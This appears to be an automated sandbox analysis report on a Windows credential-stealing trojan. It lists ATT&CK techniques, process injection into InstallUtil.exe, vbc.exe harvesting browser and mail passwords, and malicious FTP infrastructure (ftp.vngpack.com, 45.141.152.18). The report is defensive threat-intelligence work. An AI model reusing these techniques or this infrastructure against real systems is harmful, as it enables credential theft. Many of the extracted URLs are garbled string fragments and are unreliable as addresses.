Domain Accounts | Shared Modules1 | Logon Script (Windows) | Access Token Manipulation1 | Obfuscated Files or Information31 | Credentials in Registry2 | Account Discovery1 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Remote Access Software1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection312 | Software Packing11 | Credentials In Files1 | File and Directory Discovery1 | Distributed Component Object Model | Input Capture1 | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | System Information Discovery18 | SSH | Clipboard Data1 | Data Transfer Size Limits | Application Layer Protocol12 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts1 | Cached Domain Credentials | Query Registry1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Security Software Discovery31 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion21 | Proc Filesystem | Virtualization/Sandbox Evasion21 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection312 | /etc/passwd and /etc/shadow | Process Discovery4 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Hidden Files and Directories2 | Network Sniffing | Application Window Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Owner/User Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | Remote System Discovery1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 454641, Sample: ypBoHI5G3x, Startdate: 27/07/2021, Architecture: WINDOWS, Score: 100

Start
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
• Process: ypBoHI5G3x.exe (15 4), started
  • DNS/IP Info: www.google.com 142.250.185.196, 443, 49723 GOOGLEUS United States
  • Created File (dropped): C:\Users\user\AppData\...\InstallUtil.exe, PE32
  • Created File (dropped): C:\Users\user\AppData\...\ypBoHI5G3x.exe.log, ASCII
  • Signatures: Writes to foreign memory regions; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
  • Process: InstallUtil.exe (14 4), started
    • DNS/IP Info: ftp.vngpack.com 45.141.152.18, 21, 49759, 49760 M247GB Romania; 192.168.2.1 unknown unknown; 146.215.12.0.in-addr.arpa
    • Signatures: Changes the view of files in windows explorer (hidden files and folders); Sample uses process hollowing technique
    • Process: vbc.exe (13), started
      • Signatures: Tries to steal Mail credentials (via file registry); Tries to harvest and steal browser information (history, passwords, etc)
    • Process: vbc.exe (1), started
      • Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label | Link
ypBoHI5G3x.exe | 29% | Virustotal | | Browse
ypBoHI5G3x.exe | 33% | ReversingLabs | ByteCode-MSIL.Trojan.Phonzy |
ypBoHI5G3x.exe | 100% | Joe Sandbox ML | |

            Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | ReversingLabs | |

            Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
1.2.ypBoHI5G3x.exe.43944ca.8.unpack | 100% | Avira | TR/Inject.vcoldi | | Download File
12.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac | | Download File
12.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473 | | Download File
1.2.ypBoHI5G3x.exe.419b8ea.4.unpack | 100% | Avira | TR/Inject.vcoldi | | Download File
18.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438 | | Download File

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label | Link
http://www.monotype.S | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.carterandcone.comva | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/Verdk | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.fontbureau.comFD | 0% | Avira URL Cloud | safe |
http://ns.adobe.c/g | 0% | URL Reputation | safe |
http://www.fontbureau.comessed | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.carterandcone.com | 0% | URL Reputation | safe |
http://www.carterandcone.comro | 0% | Avira URL Cloud | safe |
http://www.fontbureau.coml1 | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://ftp.vngpack.com | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cno | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/6 | 0% | URL Reputation | safe |
http://www.carterandcone.comue | 0% | URL Reputation | safe |
http://www.carterandcone.com-sM | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp// | 0% | URL Reputation | safe |
http://www.fontbureau.comay | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/cs-c | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/wvR | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/settR | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comgrito | 0% | URL Reputation | safe |
http://www.founder.com.cn/cntra: | 0% | Avira URL Cloud | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.carterandcone.como. | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://ns.adobe.c/g%%N | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comF | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/R | 0% | URL Reputation | safe |
http://www.founder.com.cn/cnomp$ | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/wuR | 0% | Avira URL Cloud | safe |
http://www.zhongyicts.com.cnm | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/G | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/D | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.carterandcone.com.F | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.fontbureau.comdR | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cnhic | 0% | Avira URL Cloud | safe |
http://www.carterandcone.comw | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.fontbureau.como | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/adnl | 0% | URL Reputation | safe |
http://www.carterandcone.comou | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comitu | 0% | URL Reputation | safe |
http://www.fontbureau.comu | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comm( | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/c | 0% | URL Reputation | safe |
http://ns.ado/1 | 0% | URL Reputation | safe |

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.185.196 | true | false | | high
ftp.vngpack.com | 45.141.152.18 | true | true | | unknown
146.215.12.0.in-addr.arpa | unknown | unknown | false | | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.monotype.S | InstallUtil.exe, 0000000C.00000003.468375972.0000000005D70000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.comva | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Verdk | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comFD | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.adobe.c/g | ypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comessed | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comro | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schema.org/WebPage | ypBoHI5G3x.exe, 00000001.00000002.448077774.0000000003167000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.coml1 | InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ftp.vngpack.com | InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cno | InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/6 | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comue | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com-sM | InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp// | InstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comay | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/cs-c | InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/wvR | InstallUtil.exe, 0000000C.00000003.457780221.0000000005D49000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://whatismyipaddress.com/- | ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/settR | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comgrito | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://login.yahoo.com/config/login | vbc.exe | false | | high
http://www.fonts.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cntra: | InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.site.com/logs.php | InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp | false | | high
http://www.urwpp.deDPlease | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | vbc.exe, vbc.exe, 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp | false | | high
http://www.zhongyicts.com.cn | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.como. | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ns.adobe.c/g%%N | ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://2542116.fls.doubleclick.net/activi | vbc.exe, 00000012.00000003.493497095.00000000022DC000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comF | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/R | InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnomp$ | InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/wuR | InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cnm | InstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/G | InstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/D | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com.F | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/ | InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comdR | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnhic | InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comw | InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comm | InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.como | InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/adnl | InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.comou | InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comitu | InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | vbc.exe | false | | high
                                                        http://www.fontbureau.comuInstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.comm(InstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.jiyu-kobo.co.jp/cInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://ns.ado/1ypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown

                                                          Contacted IPs

                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.196 | www.google.com | United States | 15169 | GOOGLEUS | false
45.141.152.18 | ftp.vngpack.com | Romania | 9009 | M247GB | true

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:454641
                                                          Start date:27.07.2021
                                                          Start time:11:11:43
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 4s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:ypBoHI5G3x (renamed file extension from none to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 4.6% (good quality ratio 4.4%)
                                                          • Quality average: 84.2%
                                                          • Quality standard deviation: 25%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 13.88.21.125, 131.253.33.200, 13.107.22.200, 52.255.188.83, 20.82.210.154, 20.54.110.249, 67.27.158.126, 8.253.95.249, 8.248.115.254, 67.26.75.254, 67.27.158.254, 40.112.88.60, 20.50.102.62, 80.67.82.235, 80.67.82.211, 23.211.4.86, 20.82.209.183
                                                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
11:12:55 | API Interceptor | 211x Sleep call for process: ypBoHI5G3x.exe modified
11:13:44 | API Interceptor | 5x Sleep call for process: InstallUtil.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

Match | Associated Sample Name / URL | Detection | Context
45.141.152.18 | Confirmarea platii.pdf.exe | malicious | alfawood.us/xsclk/index.php
45.141.152.18 | Confirmarea platii.pdf.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | e-dekont.html.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | Credit Advice -TT6635993652908.PDF.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | alfawood.us/xsclk/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | blkgrupdoom.info/scgn/index.php
45.141.152.18 | e-dekont.html.exe | malicious | blkgrupdoom.info/scgn/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | blkgrupdoom.info/scgn/index.php

                                                          Domains

                                                          No context

                                                          ASN

Match | Associated Sample Name / URL | Detection | Context
M247GB | 82658.exe | malicious | 45.141.152.18
M247GB | lLc1G9C259 | malicious | 185.206.229.147
M247GB | vTHj1xits9 | malicious | 38.206.10.73
M247GB | cNqgk3ITHS | malicious | 38.207.37.118
M247GB | nNb9qLGPaO | malicious | 185.158.248.209
M247GB | 2N1tt5eaCn | malicious | 161.123.233.98
M247GB | AttachedWaybill.exe | malicious | 37.120.138.210
M247GB | UAbJbUWQVk.exe | malicious | 89.45.4.101
M247GB | NHnpjXX0sb | malicious | 196.17.120.85
M247GB | Paidcheck.pdf.exe | malicious | 217.138.212.57
M247GB | List_to_clear_62237.xlsm | malicious | 5.61.62.219
M247GB | List_to_clear_62237.xlsm | malicious | 5.61.62.219
M247GB | 87597.exe | malicious | 45.141.152.18
M247GB | NJrrXRv8zV | malicious | 196.19.8.206
M247GB | DpuO7oic9y.exe | malicious | 86.106.143.143
M247GB | download.dat.exe | malicious | 194.187.251.163
M247GB | WindowsFormsApp1.exe | malicious | 194.187.251.163
M247GB | file2.exe | malicious | 141.98.102.243
M247GB | Anarchy_Client.exe | malicious | 77.243.181.86
M247GB | 2N9Nc0H82F.exe | malicious | 37.120.206.86

                                                          JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
54328bd36c14bd82ddaa0c04b25ed9ad | hcpUDQyVUZ.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | 000100049000TK.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | 000900049000T2000.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PO#JFUB0002 4QjPQ2oE-pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | invoice.02 Nazih El Chouli.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | tiG7noOyfw.exe | malicious | 142.250.185.196
